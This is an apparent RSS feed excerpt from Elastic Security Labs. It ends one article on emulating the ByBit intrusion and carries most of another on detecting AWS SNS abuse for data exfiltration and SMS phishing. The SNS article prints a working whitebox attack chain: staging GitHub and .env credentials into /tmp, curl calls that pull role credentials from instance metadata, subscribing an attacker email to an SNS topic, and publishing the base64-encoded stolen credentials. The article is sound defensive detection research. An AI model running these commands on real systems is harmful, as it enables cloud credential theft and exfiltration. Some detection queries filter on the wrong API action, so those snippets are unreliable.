<p>When running Elastic Defend through Elastic Agent, you can also deploy the OSQuery Manager integration to centrally manage Osquery across all agents in your Fleet. This enables you to query host data using distributed SQL. During our testing of the Dockerized malicious application, we used OSQuery to inspect the endpoint and successfully identified the container running with privileged permissions.</p>
<pre><code class="language-sql">SELECT name, image, readonly_rootfs, privileged FROM docker_containers
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image18.png" alt="Elastic OSQuery Live Query" /></p>
<p>We scheduled this query to run on a recurring basis, sending results back to our Elastic Stack. From there, we built a threshold-based detection rule that alerts whenever a new privileged container appears on a user’s system and hasn’t been observed in the past seven days.</p>
<h2>Conclusion</h2>
<p>The ByBit attack was one of the most consequential intrusions attributed to DPRK threat actors—and thanks to detailed reporting and available artifacts, it also provided a rare opportunity for defenders to emulate the full attack chain end to end. By recreating the compromise of a SAFE developer’s macOS workstation—including initial access, payload execution, and AWS pivoting—we validated our detection capabilities against real-world nation-state tradecraft.</p>
<p>This emulation not only highlighted technical insights—like how PyYAML deserialization can be abused to gain initial access—but also reinforced critical lessons in operational defense: the value of user awareness, behavior-based EDR coverage, secure developer workflows, effective cloud IAM policies, cloud logging and holistic detection/response across platforms.</p>
<p>Adversaries are innovating constantly, but so are defenders—and this kind of research helps tip the balance. We encourage you to follow <a href="https://x.com/elasticseclabs">@elasticseclabs</a> and check out our threat research at <a href="https://www.elastic.co/es/security-labs">elastic.co/security-labs</a> to stay ahead of evolving adversary techniques.</p>
<p>Resources:</p>
<ol>
<li><a href="https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/">Bybit – What We Know So Far</a></li>
<li><a href="https://x.com/safe/status/1897663514975649938">Safe.eth on X: &quot;Investigation Updates and Community Call to Action&quot;</a></li>
<li><a href="https://slowmist.medium.com/cryptocurrency-apt-intelligence-unveiling-lazarus-groups-intrusion-techniques-a1a6efda7d34">Cryptocurrency APT Intelligence: Unveiling Lazarus Group’s Intrusion Techniques</a></li>
<li><a href="https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/">Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware</a></li>
<li><a href="https://www.elastic.co/es/security-labs/dprk-code-of-conduct">Code of Conduct: DPRK’s Python-fueled intrusions into secured networks</a></li>
<li><a href="https://www.elastic.co/es/security-labs/elastic-catches-dprk-passing-out-kandykorn">Elastic catches DPRK passing out KANDYKORN</a></li>
</ol>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/bit-bybit.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[AWS SNS Abuse: Data Exfiltration and Phishing]]></title>
            <link>https://www.elastic.co/es/security-labs/aws-sns-abuse</link>
            <guid>aws-sns-abuse</guid>
            <pubDate>Thu, 13 Mar 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[During a recent internal collaboration, we  dug into publicly known SNS abuse attempts and our knowledge of the data source to develop detection capabilities.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Welcome to another installment of AWS detection engineering with Elastic. This article will dive into both how threat adversaries (TA) leverage AWS’ Simple Notification Service (SNS) and how to hunt for indicators of abuse using that data source.</p>
<p>Expect to learn about potential techniques threat adversaries may exercise in regards to SNS. We will also explore security best practices, hardening roles and access, as well as how to craft threat detection logic for SNS abuse.</p>
<p>This research was the result of a recent internal collaboration that required us to leverage SNS for data exfiltration during a whitebox exercise. During this collaboration, we became intrigued by how a simple publication and subscription (pub/sub) service could be abused by adversaries to achieve various actions on objectives. We dug into publicly known SNS abuse attempts and our knowledge of the data source to assemble this research about detection opportunities.</p>
<p>Do enjoy!</p>
<h1>Understanding AWS SNS</h1>
<p>Before we get started on the details, let’s discuss what AWS SNS is to have a basic foundational understanding.</p>
<p>AWS SNS is a web service that allows users to send and receive notifications from the cloud. Think of it like a news feed service where a digital topic is created, those who are interested with updates subscribe via email, slack, etc. and when data is published to that topic, all subscribers are notified and receive it. This describes what is commonly referred to as a pub/sub service provided commonly by cloud service providers (CSP). In Azure, this is offered as <a href="https://azure.microsoft.com/en-us/products/web-pubsub">Web PubSub</a>, whereas GCP offers <a href="https://cloud.google.com/pubsub#documentation">Pub/Sub</a>. While the names of these services may slightly differ from platform to platform, the utility and purpose do not.</p>
<p>SNS provides two workflows, <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-user-notifications.html">application-to-person</a> (A2P) , and <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-system-to-system-messaging.html">application-to-application</a> (A2A) that serve different purposes. A2P workflows focus more on integral operation with AWS services such as Firehose, Lambda, SQS and more. However, for this article we are going to focus our attention on A2P workflows. As shown in the diagram below, an SNS topic is commonly created, allowing subscribers to leverage SMS, email or push notifications for receiving messages.</p>
<h1><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image5.png" alt="" /></h1>
<h1><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image12.png" alt="" /></h1>
<p><strong>Additional Features:</strong></p>
<p><strong>Filter Policies:</strong> Subscribers can  define filtering rules to receive only a relevant subset of messages if they choose. These filter policies are defined in JSON format; specifying which attributes of a message the subscriber is interested in. SNS evaluates these policies server-side before delivery to determine which subscribers the messages should be sent to.</p>
<p><strong>Encryption</strong>: SNS leverages <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-server-side-encryption.html">server-side encryption</a> (SSE) using AWS Key Management Service (KMS) to secure messages at rest. When encryption is enabled, messages are encrypted before being stored in SNS and then decrypted upon delivery to the endpoint. This is of course important for maintaining the security of Personal Identifiable Information (PII) or other sensitive data such as account numbers. Not to fear, although SNS only encrypts at rest, other protocols (such as HTTPS) handle encryption in transit, making it end-to-end (E2E).</p>
<p><strong>Delivery Retries and Dead Letter Queues (DLQs)</strong>: SNS automatically retries message delivery to endpoints, such as SQS, Lambda, etc. in case of unexpected failures. However, messages that fail to deliver ultimately reside in <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html">DLQs</a>, which is typically an AWS SQS queue enabling debugging for developers.</p>
<p><strong>Scalability</strong>: AWS SNS is designed to handle massive message volumes, automatically scaling to accommodate increasing traffic without manual intervention. There are no upfront provisioning requirements, and you pay only for what you use, making it cost-effective for most organizations.</p>
<p>AWS SNS is a powerful tool for facilitating communication in cloud environments. For a deeper understanding, we recommend diving into the existing <a href="https://docs.aws.amazon.com/sns/latest/dg/welcome.html">documentation</a> from AWS. However, its versatility and integration capabilities also make it susceptible to abuse. In the next section, we explore some scenarios where adversaries might leverage SNS for malicious purposes.</p>
<h1>Whitebox Testing</h1>
<p>Whitebox testing involves performing atomic emulations of malicious behavior in a controlled environment, with full visibility into the vulnerable or misconfigured infrastructure and its configurations. This approach is commonly employed in cloud environments to validate detection capabilities during the development of threat detection rules or models targeting specific tactics, techniques, and procedures (TTPs).. Unlike endpoint environments, where adversary simulations often involve detonating malware binaries and tools, cloud-based TTPs typically exploit existing API-driven services through &quot;living-off-the-cloud&quot; techniques, making this approach essential for accurate analysis and detection.</p>
<h2>Data Exfiltration via SNS</h2>
<p>Exfiltration via SNS starts with creating a topic that serves as a proxy for receiving stolen data and delivering it to the external media source, such as email or mobile. Adversaries would then subscribe that media source to the topic so that any data received is forwarded to them. After this is staged, it is only a matter of packaging data and publishing it to the SNS topic, which handles the distribution. This method allows adversaries to bypass traditional data protection mechanisms such as network ACLs, and exfiltrate information to unauthorized external destinations.</p>
<p><strong>Example Workflow:</strong></p>
<ul>
<li>Land on EC2 instance and perform discovery of sensitive data, stage it for later</li>
<li>Leverage IMDSv2 and STS natively with the installed AWS CLI to get temporary creds</li>
<li>Create a topic in SNS and attach an external email address as a subscriber</li>
<li>Publish sensitive information to the topic, encoded in Base64 (or plaintext)</li>
<li>The external email address receives the exfiltrated data</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image3.png" alt="Visual workflow for data exfiltration via AWS SNS" /></p>
<h3>Infrastructure Setup</h3>
<p>For the victim infrastructure, we’ll use our preferred infrastructure-as-code (IaC) framework, Terraform.</p>
<p>A <a href="https://gist.github.com/terrancedejesus/a01aa8f75f715e6baa726a21fcdf2289">public gist</a> has been created, containing all the necessary files to follow this example.. In summary, these Terraform configurations deploy an EC2 instance in AWS within a public subnet. The setup includes a <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html">user-data script</a> that adds dummy credentials for sensitive data as environment variables, and installs the AWS CLI to emulate a compromised environment. Additionally, the EC2 instance is assigned an IAM role with permissions for <code>sns:Publish</code>, <code>sns:Subscribe</code> and <code>sns:CreateTopic</code>.</p>
<p>There are several potential ways an adversary might gain initial access to this EC2 instance, including exploiting vulnerable web applications for web shell deployment, using stolen SSH credentials, password spraying or credential stuffing. Within this particular example scenario; let’s assume the attacker gained initial entry via a vulnerable web application, and subsequently uploaded a web shell. The next goal in this case would be persistence via credential access.. This is commonly seen <a href="https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603">in-the-wild</a> when adversaries target popular 3rd-party software or web apps such as Oracle WebLogic, Apache Tomcat, Atlassian Confluence, Microsoft Exchange and much more.</p>
<p>To get started, download the Terraform files from the gist.</p>
<ol>
<li>Adjust the variables in the <code>variables.tf</code> file to match your setup.
<ol>
<li>Add your whitelisted IPv4 addressfor trusted_ip_cidr</li>
<li>Add your local SSH key file path to public_key_path</li>
<li>Ensure the ami_id.default is the correct AMI-ID for your region</li>
</ol>
</li>
<li>Run <code>terraform init</code> in the folder to initialize the working directory.</li>
</ol>
<p>When ready, run <code>terraform apply</code> to deploy the infrastructure.</p>
<p>A few reminders:</p>
<ul>
<li>Terraform uses your AWS CLI default profile, so ensure you’re working with the correct profile in your AWS configuration.</li>
<li>The provided AMI ID is specific to the <code>us-east-1</code> region. If you're deploying in a different region, update the AMI ID accordingly in the <code>variables.tf</code> file.</li>
<li>Change <code>trusted_ip_cidr.default</code> in <code>variables.tf</code> from 0.0.0.0/0 (any IP) to your publicly known CIDR range.</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image2.png" alt="" /></p>
<p><em>Terraform apply output</em></p>
<p>Let’s SSH into our EC2 instance to ensure that our sensitive credentials were created from the user-data script. Note in the <code>outputs.tf</code> file, we ensured that the SSH command would be generated for us based on the key path and public IP of our EC2 instance.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image10.png" alt="Bash command output for credential check" /></p>
<p>With this infrastructure staged and confirmed, we can then move on to practical execution.</p>
<h3>The Workflow in Practice: Exfiltrating Sensitive Credentials</h3>
<p>Let’s step through this workflow in practice, now that our infrastructure is established. As a reminder, the goal of our opportunistic adversary is to check for local credentials, grab what they can and stage the sensitive data locally. Since landing on this EC2 instance, we have identified the AWS CLI exists, and identified we have SNS permissions. Thus, we plan to create a SNS topic, register an external email as a subscriber and then exfiltrateour stolen credentials and other data as SNS messages.</p>
<p>Note: While this example is extremely simple, the goal is to focus on SNS as a methodology for exfiltration. The exact circumstances and scenario will differ depending on the specific infrastructure setup of the victim.</p>
<p><strong>Identify and Collect Credentials from Common Locations:</strong><br />
Our adversary will target GitHub credentials files and .env files locally with some good ol’ fashioned Bash scripting. This will take the credentials from these files and drop them into the <code>/tmp</code> temporary folder, staging them for exfiltration.</p>
<p>Command: cat /home/ubuntu/.github/credentials /home/ubuntu/project.env &gt; /tmp/stolen_creds.txt</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image11.png" alt="" /></p>
<p><strong>Stage Exfiltration Method by Creating SNS Topic</strong><br />
Let’s leverage the existing AWS CLI to create the SNS topic. As a reminder, this EC2 instance assumes the custom IAM role we created and attached, which allows it to create SNS topics and publish messages. Since the AWS CLI is pre-installed on our EC2 instance, it will retrieve temporary credentials from IMDSv2 for the assumed role when invoked. However, if this were not the case, an adversary could retrieve credentials natively with the following bash code.</p>
<pre><code># Fetch the IMDSv2 token
TOKEN=$(curl -X PUT &quot;http://169.254.169.254/latest/api/token&quot; -H &quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;)

# Get the IAM role name
ROLE_NAME=$(curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; http://169.254.169.254/latest/meta-data/iam/security-credentials/)

# Fetch the temporary credentials
CREDENTIALS=$(curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME)

# Extract the Access Key, Secret Key, and Token
AWS_ACCESS_KEY_ID=$(echo $CREDENTIALS | jq -r '.AccessKeyId')
AWS_SECRET_ACCESS_KEY=$(echo $CREDENTIALS | jq -r '.SecretAccessKey')
AWS_SESSION_TOKEN=$(echo $CREDENTIALS | jq -r '.Token')
</code></pre>
<p>Once this is complete, let’s attempt to create our SNS topic and the email address that will be used as our external receiver for the exfiltrated data.</p>
<p>Create Topic Command: <code>TOPIC_ARN=$(aws sns create-topic --name &quot;whitebox-sns-topic&quot; --query 'TopicArn' --output text)</code></p>
<p>Subscribe Command: <code>aws sns subscribe --topic-arn &quot;$TOPIC_ARN&quot; --protocol email --notification-endpoint &quot;adversary@protonmail.com&quot;</code></p>
<p>As shown above after the commands are run, we can then navigate to the inbox of the external email address to confirm subscription. Once confirmed, our external email address will now receive any messages sent to the <code>whitebox-sns-topic topic</code> which we plan to use for exfiltration.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image9.png" alt="" /></p>
<p><strong>Exfiltrate Data via SNS Publish</strong><br />
At this point, we have gained access to an EC2 instance, snooped around to understand our environment, identified some services for abuse and some credentials that we want to obtain. Note that our previous steps could all have been accomplished via a simple Bash script that could be dropped on the compromised EC2 instance via our webshell, but this is broken down into individual steps for example purposes..</p>
<p>Next, we can take the data we stored in <code>/tmp/stolen_creds.txt</code>, base64 encode it and ship it to our adversary controlled email address via SNS.</p>
<p>Commands:</p>
<ul>
<li>Base64 encode contents: <code>BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt)</code></li>
<li>Publish encoded credentials to our topic: <code>aws sns publish --topic-arn &quot;$TOPIC_ARN&quot; --message &quot;$BASE64_CONTENT&quot; --subject &quot;Encoded Credentials from EC2&quot;</code></li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image7.png" alt="" /></p>
<p>Once completed, we can simply check our inbox for these exfiltrated credentials.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image1.png" alt="" /></p>
<p>Taking the payload from our message, we can decode it to see that it represents the credentials we found lying around on the EC2 instance.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image6.png" alt="" /></p>
<p>As many adversaries may attempt to establish persistence or laterally move throughout the AWS environment and services, they would then be able to rely on this SNS topic to exfiltrate data for as long as permissions were in scope for the IAM user or role. Additionally, they could set up a recurring job that scans for data on this EC2 instance and continually exfiltrates anything interesting over time. There are many practical options in this scenario for additional chaining that could be done.</p>
<p><strong>Before continuing, we encourage you to use the following command to destroy your infrastructure once logging out of the SSH connection</strong>: <code>terraform destroy --auto-approve</code></p>
<h3>Challenges for Adversaries:</h3>
<p>Of course, there are many uncertaintiesin any whitebox testing that may prove as roadblocks or hurdles for a TA, both advanced and immature in knowledge, skills and abilities. It is also very dependent on the configuration and environment of the potential victim. Below are additional challenges that adversaries would face.</p>
<p><strong>Initial Access</strong>: Gaining initial access to the EC2 instance is often the biggest hurdle. This could involve exploiting a vulnerable web application or 3rd-party service, using stolen SSH credentials, password spraying or credential stuffing, or leveraging other means such as social engineering or phishing. Without initial access, the entire attack chain is infeasible.</p>
<p><strong>Establishing an Active Session</strong>: After gaining access, maintaining an active session can be difficult, especially if the environment includes robust endpoint protection or regular reboots that clear unauthorized activity. Adversaries may need to establish a persistent foothold using techniques like a webshell, reverse shell or an automated dropper script.</p>
<p><strong>AWS CLI Installed on the Instance</strong>: The presence of the AWS CLI on a public-facing EC2 instance is uncommon and not considered a best practice. Many secure environments avoid pre-installing the AWS CLI, forcing adversaries to bring their own tools or rely on less direct methods to interact with AWS services.</p>
<p><strong>IAM Role Permissions</strong>: The IAM role attached to the EC2 instance must include permissive policies for SNS actions (<code>sns:Publish</code>, <code>sns:Subscribe</code>, <code>sns:CreateTopic, sts:GetCallerIdentity</code>). Many environments restrict these permissions to prevent unauthorized use, and misconfigurations are often necessary for the attack to succeed. Best security practices such as principle-of-least-privilege (PoLP) would ensure the roles are set up with only necessary permissions.</p>
<p><strong>Execution of Malicious Scripts</strong>: Successfully executing a script or running commands without triggering alarms (e.g., CloudTrail, GuardDuty, EDR agents) is a challenge. Adversaries must ensure their activities blend into legitimate traffic or use obfuscation techniques to evade detection.</p>
<h3>Advantages for Adversaries</h3>
<p>Of course, while there are challenges for the adversary with these techniques, let’s consider some crucial advantages that they may have as well.</p>
<ul>
<li><strong>Blending In with Native AWS Services</strong>: By leveraging AWS SNS for data exfiltration, the adversary's activity appears as legitimate usage of a native AWS flagship service. SNS is commonly used for notifications and data dissemination, making it less likely to raise immediate suspicion.</li>
<li><strong>Identity Impersonation via IAM Role</strong>: Actions taken via the AWS CLI are attributed to the IAM role attached to the EC2 instance. If the role already has permissions for SNS actions and is used regularly for similar tasks, adversarial activity can blend seamlessly with expected operations.</li>
<li><strong>No Concerns with Security Groups or Network ACLs</strong>: Since SNS communication occurs entirely within the confines of AWS, there’s no reliance on security group or Network ACL configurations. This bypasses traditional outbound traffic controls, ensuring the adversary's data exfiltration attempts are not blocked.</li>
<li><strong>Lack of Detections for SNS Abuse</strong>: Abuse of SNS for data exfiltration is under-monitored in many environments. Security teams may focus on more commonly abused AWS services (e.g., S3 or EC2) and lack dedicated detections or alerts for unusual SNS activity, such as frequent topic creation or large volumes of published messages.</li>
<li><strong>Minimal Footprint with Non-Invasive Commands</strong>: Local commands used by the adversary (e.g., <code>cat</code>, <code>echo</code>, <code>base64</code>) are benign and do not trigger endpoint detection and response (EDR) tools typically. These commands are common in legitimate administrative tasks, allowing adversaries to avoid detection on backend Linux systems.</li>
<li><strong>Efficient and Scalable Exfiltration</strong>: SNS enables scalable exfiltration by allowing adversaries to send large amounts of data to multiple subscribers. Once set up, the adversary can automate periodic publishing of sensitive information with minimal additional effort.</li>
<li><strong>Persistent Exfiltration Capabilities</strong>: As long as the SNS topic and subscription remain active, the adversary can use the infrastructure for ongoing exfiltration. This is especially true if the IAM role retains its permissions and no proactive monitoring is implemented.</li>
<li><strong>Bypassing Egress Monitoring and DLP</strong>: Since the data is exfiltrated through SNS within the AWS environment, it bypasses traditional egress monitoring or data loss prevention solutions that focus on outbound traffic to external destinations.</li>
</ul>
<h1>In-the-Wild Abuse</h1>
<p>While whitebox scenarios are invaluable for simulating potential adversarial behaviors, it is equally important to ground these simulations with in-the-wild (ItW) threats. To this end, we explored publicly available research and identified a <a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">key article</a> from SentinelOne describing a spam messaging campaign that leveraged AWS SNS. Using insights from this research, we attempted to replicate these techniques in a controlled environment to better understand their implications.</p>
<p>Although we will not delve into the attribution analysis outlined in SentinelOne’s research, we highly recommend reviewing their work for a deeper dive into the campaign’s origins. Instead, our focus is on the tools and techniques employed by the adversary to abuse AWS SNS for malicious purposes.</p>
<h2>Smishing and Phishing</h2>
<p>Compromised AWS environments with pre-configured SNS services can serve as launchpads for smishing (SMS phishing) or phishing attacks. Adversaries may exploit legitimate SNS topics and subscribers to distribute fraudulent messages internally or externally, leveraging the inherent trust in an organization’s communication channels.</p>
<p>As detailed in SentinelOne’s <a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">blog</a>, the adversary employed a Python-based tool known as <strong>SNS Sender</strong>. This script enabled bulk SMS phishing campaigns by interacting directly with AWS SNS APIs using compromised AWS credentials. These authenticated API requests allowed the adversary to bypass common safeguards and send phishing messages in mass..</p>
<p>The <a href="https://www.virustotal.com/gui/file/6d8c062c23cb58327ae6fc3bbb66195b1337c360fa5008410f65887c463c3428"><strong>SNS Sender script</strong></a> leverages valid AWS access keys and secrets to establish authenticated API sessions via the AWS SDK. Armed with these credentials, adversaries can craft phishing workflows that include:</p>
<ol>
<li>Establishing authenticated SNS API sessions via the AWS SDK.</li>
<li>Enumerating and targeting lists of phone numbers to serve as phishing recipients.</li>
<li>Utilizing a pre-registered Sender ID (if available) for spoofing trusted entities.</li>
<li>Sending SMS messages containing malicious links, often impersonating a legitimate service.</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/image4.png" alt="" /></p>
<p>Elastic Security Labs predicts that the use of one-off or commercially available tools for abusing cloud services, like SNS Sender, will continue to grow as a research focus. This underscores the importance of understanding these tools and their impact on cloud security.</p>
<h3>Weaponization and Pre-Testing Considerations</h3>
<p>To successfully execute a phishing campaign at scale using AWS SNS, the adversary would have needed access to an already registered AWS End User Messaging organization. AWS restricts new accounts to SNS Sandbox Mode, which limits SMS sending to manually verified phone numbers. To bypass sandbox restrictions, adversaries would need access to an account already approved for production SMS messaging. The process of testing and weaponization would have required several key steps.</p>
<p>A fully configured AWS End User Messaging setup would require:</p>
<ul>
<li>An established origination identity (which includes a long code, toll-free number, or short code).</li>
<li>Regulatory approval through a brand registration process.</li>
<li>Carrier pre-approval for high-volume SMS messaging.</li>
</ul>
<p>Without these pre-registered identifiers, AWS SNS messages may be deprioritized, blocked, or fail to send.</p>
<p>Before deploying a large-scale attack, adversaries would likely test SMS delivery using verified phone numbers within AWS SNS Sandbox Mode. This process requires:</p>
<ul>
<li>Manually verifying phone numbers before sending messages.</li>
<li>Ensuring their carrier allows AWS SNS sandbox messages, as some (like T-Mobile and Google Voice) frequently block AWS SNS sandbox verification SMS.</li>
<li>Testing delivery routes across different AWS regions to identify which countries permit custom Sender IDs or allow non-sandbox messages.</li>
</ul>
<p>If an attacker’s test environment failed to receive SNS verification OTPs, they would likely pivot to a different AWS account or leverage a compromised AWS account that already had production-level messaging permissions.</p>
<p>In addition to this, the adversary would likely prioritize transactional messages over promotional. Transactional messages are prioritized by AWS (OTPs, security alerts, etc.) - whereas promotional messages are lower priority and may be filtered or blocked by certain carriers.</p>
<p>If adversaries cannot override message type defaults, their phishing messages may be deprioritized or rejected by AWS, which could be a hurdle.</p>
<p><strong>Registered Origination Identity &amp; Sender ID (If Supported)</strong></p>
<p>AWS requires brand registration and origination identity verification for businesses sending high-volume SMS messages. Depending on the region and carrier, adversaries may be able to exploit different configurations:</p>
<ul>
<li><strong>Sender ID Abuse</strong>: In some non-U.S. regions, adversaries could register a Sender ID to make phishing messages appear from a trusted entity. This may allow for spoofing banks, shipping companies, or government agencies, making the phishing attempt more convincing.</li>
<li><strong>Long Code &amp; Toll-Free Exploitation</strong>: AWS SNS assigns long codes (standard phone numbers) or toll-free numbers for outbound SMS. Toll-free numbers require registration but could still be abused if an adversary compromises an AWS account with an active toll-free messaging service.</li>
<li><strong>Short Code Restrictions</strong>: High-throughput short codes (5- or 6-digit numbers) are often carrier-controlled and require additional vetting, making them less practical for adversaries.</li>
</ul>
<h3><strong>Infrastructure Setup</strong></h3>
<p>By default, AWS accounts that have not properly configured the <a href="https://docs.aws.amazon.com/sms-voice/latest/userguide/what-is-sms-mms.html">End User Messaging</a> service are restricted to an <a href="https://aws.amazon.com/blogs/compute/introducing-the-sms-sandbox-for-amazon-sns/"><strong>SMS sandbox</strong></a>. This sandbox allows developers to test SMS functionality by sending messages to verified phone numbers. However, as we discovered, the process of verifying numbers in the sandbox is fraught with challenges.</p>
<p>Despite repeated attempts to register phone numbers with the sandbox, we found that verification messages (OTP codes) failed to arrive at endpoints across various carriers and services, including Google Voice and Twilio. This suggests that mobile carriers may block these sandbox-originated messages, effectively stalling the verification process but ultimately blocking us from emulating the behavior.</p>
<p>For production use, <a href="https://docs.aws.amazon.com/sns/latest/dg/sns-sms-sandbox-moving-to-production.html">migrating</a> from the sandbox requires a fully configured AWS End User Messaging service. This includes:</p>
<ul>
<li>A legitimate Sender ID.</li>
<li>A phone pool for failovers.</li>
<li>Origination identity.</li>
<li>Brand registration for regulatory compliance.</li>
</ul>
<p>This setup aligns with the requirements of the SNS Sender script and represents an ideal environment for adversaries. The use of a Sender ID, which relies on a pre-established <a href="https://docs.aws.amazon.com/sns/latest/dg/channels-sms-originating-identities.html">origination identity</a> and brand registration, allows phishing messages to appear as though they originate from a reputable organization. This reduces the likelihood of detection or carrier-level blocking, increasing the success rate of the campaign.</p>
<p>The requirements for this attack suggests adversaries are likely to target companies that use AWS End User Messaging for automated SMS alerts and messaging. Industries such as logistics and delivery services, e-commerce platforms, and travel and hospitality are prime targets due to their reliance on automated SMS notifications.</p>
<p>On the recipient's side, the phishing message appears as if it originates from a trusted entity, bypassing carrier alarms and evading suspicion.</p>
<p>During our testing, we encountered unexpected behavior with logging in CloudTrail when attempting to use the script and AWS CLI to send SMS messages directly through SNS. Failed message delivery attempts did not appear in CloudTrail logs as expected.</p>
<p>Although the <a href="https://docs.aws.amazon.com/sns/latest/api/API_Publish.html"><strong>Publish</strong></a> API call is generally logged in CloudTrail (provided data plane events are enabled), it remains unclear if the absence of logs for failed attempts was due to inherent SNS behavior or misconfiguration on our part. This gap highlights the need for deeper investigation into how failed SNS Publish requests are handled by AWS and whether additional configurations are required to capture these events reliably.</p>
<p>As a result, we determined it would be best to include a threat hunting query for this rather than a detection rule due to the inability to fully replicate the adversary behavior, reliance on pre-established and registered brands and origination identity, in full.</p>
<h1>Detection and Hunting Opportunities</h1>
<p>For detection and hunting, CloudTrail audit logs provide enough visibility for the subsequent API calls from this activity. They also include enough contextual information to help aid with a higher fidelity of these anomalous signals. The following detections and hunting queries will leverage CloudTrail data ingested into our Elastic stack with the AWS CloudTrail integration, however they should be translatable to the SIEM of your choice if needed. For this activity, we focus solely on assumed roles, specifically those with EC2 instances being abused but this could take place elsewhere in AWS environments.</p>
<h2>SNS Topic Created by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/c5523c4d4060555e143b2d46fea1748173352b8f/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_topic_created_by_rare_user.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1608/">T1608</a></p>
<p>Identifies when an SNS topic is created by a rare AWS user identity ARN (IAM User or Role). This detection leverages Elastic’s New Terms type rules to identify when the first occurrence of a user identity ARN creates an SNS topic. It would be awfully unusual for an assumed role, typically leveraged for EC2 instances to be creating SNS topics.</p>
<p>Our query leverages KQL and <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms rule type</a> to focus on topics created by an Assumed Role specifically for an EC2 instance.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type: &quot;AssumedRole&quot;
    and aws.cloudtrail.user_identity.arn: *i-*
</code></pre>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query focuses on the CreateTopic API action from an entity whose identity type is an assumed role. We also parse the ARN to ensure that it is an EC2 instance this request is sourcing from. We can then aggregate on cloud account, entity (EC2 instance ID), assumed role name, region and user agent. If it is unusual for the EC2 instance reported to be creating SNS topics randomly, then it may be a good anomalous signal to investigate.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type == &quot;AssumedRole&quot;
| DISSECT aws.cloudtrail.request_parameters &quot;{%{?message_key}=%{message}, %{?topic_key}=%{topic_arn}}&quot;
| DISSECT aws.cloudtrail.user_identity.arn &quot;%{?}:assumed-role/%{assumed_role_name}/%{entity}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE STARTS_WITH(entity, &quot;i-&quot;)
| STATS regional_topic_publish_count = COUNT(*) by cloud.account.id, entity, assumed_role_name, topic_arn, cloud.region, user_agent_name
| SORT regional_topic_publish_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>It is unusual already for credentials from an assumed role for an EC2 instance to be creating SNS topics randomly.</li>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>An attacker could pivot into Publish API actions being called to this specific topic to identify which AWS resource is publishing messages. With access to the topic, the attacker could then further investigate the subscribers list to identify unauthorized subscribers.</li>
</ul>
<h2>SNS Topic Subscription with Email by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/exfiltration_sns_email_subscription_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_email_subscription_by_rare_user.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1567/">T1567</a>, <a href="https://attack.mitre.org/techniques/T1530/">T1530</a></p>
